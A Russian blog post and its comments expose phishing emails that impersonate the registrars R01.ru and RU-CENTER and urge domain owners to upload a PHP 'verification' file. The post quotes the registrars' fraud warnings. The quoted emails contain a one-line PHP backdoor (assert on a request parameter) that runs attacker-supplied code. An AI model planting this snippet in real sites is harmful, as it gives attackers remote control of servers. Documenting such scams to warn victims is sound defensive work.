Мошенники от R01 ru — хакерская рассылка владельцам доменов

Сегодня в 15:57 получил такое вот письмо, якобы от своего регистратора доменных имен.

Поле ОТ: R01.RU <info@r01.ru> (R01.RU)
Тема письма: Необходимо активировать домен 4memo.ru (тут указан мой домен, у вас будет свой)

Текст письма:

Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом 4memo.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1z8afzuzthnjyo0.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[R01]));
?> 

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 27 января 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

Поле ОТ в письме подменено, на самом деле реальный адрес отправителя при просмотре RFC-заголовка был такой: cl43666@bitrix166.timeweb.ru

Буквально через 40 минут получил письмо-предупреждение от реального регистратора R01.ru c ящика: support@r01.ru с темой: Рассылки от мошенников

Письмо такого содержания:

Уважаемые партнеры!

Некоторые наши клиенты получили письма от имени R01 c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом. Такие письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.

Чтобы не стать жертвой мошенничества:

° обращайте внимание на адрес отправителя — наши уведомления приходят только с адресов на домене r01.ru
° убедитесь, что ваши контакты не находятся в открытом доступе;
° никогда не загружайте вложения и не устанавливайте внешние файлы;
° в случае малейших подозрений — уточняйте информацию в службе поддержки.

Будьте бдительны!

Служба поддержки R01.ru — молодцы, быстро отреагировали!

Развод от хакеров не удался.

Понравилась статья? Поделиться с друзьями:
Комментариев: 2
  1. invest-project.ru

    Эти разводилы все никак не угомонятся.
    Сегодня прислали аналогичное письмо от имени Ру-Центра:

    RU-CENTER (no-reply@nic.tech)
    Срочное сообщение для владельца домена invest-project.ru

    Уважаемый клиент!
    В соответствии с поправками, внесенными в правила ICANN, Вы должны подтвердить, что фактическое управление доменным именем invest-project.ru осуществляется лицом, указанным в качестве его администратора.
    Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1c9b87a2o7o4b7r.php со следующим содержимым:

    ?php
    assert(stripslashes($_REQUEST[RUCENTER]));
    ?

    Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 18 августа 2017 года, 17:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.
    Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

    1. memo (автор)

      Да, от Ру-Центра тоже предупреждения приходили и в прошлом году и в этом:

      RU-CENTER (support@nic.ru)

      Уважаемый клиент!
      Некоторые наши клиенты получили письма от имени RU-CENTER c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом. Такие письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

      Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.

      Чтобы не стать жертвой мошенничества:

      ° Проверяйте достоверность информации на сайте nic.ru, если вы получили письмо, призывающее произвести проверку домена, оплату или любое другое действие, связанное с изменением правил.
      ° Если в письме содержится ссылка на сайт RU-CENTER, после перехода по ней убедитесь, что вы находитесь на сайте по адресу nic.ru, в адресной строке присутствует зелёный замок и для сайта установлен сертификат, выданный JSC ‘RU-CENTER’.
      ° В случае малейших подозрений — уточняйте информацию в службе поддержки.

      Будьте бдительны!

      P.S. Кстати, текст писем практически идентичен — это потому, что RU-CENTER и R01 — одна и та же контора, только под разными брендами с разной ценовой политикой. У них даже офис один.

Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: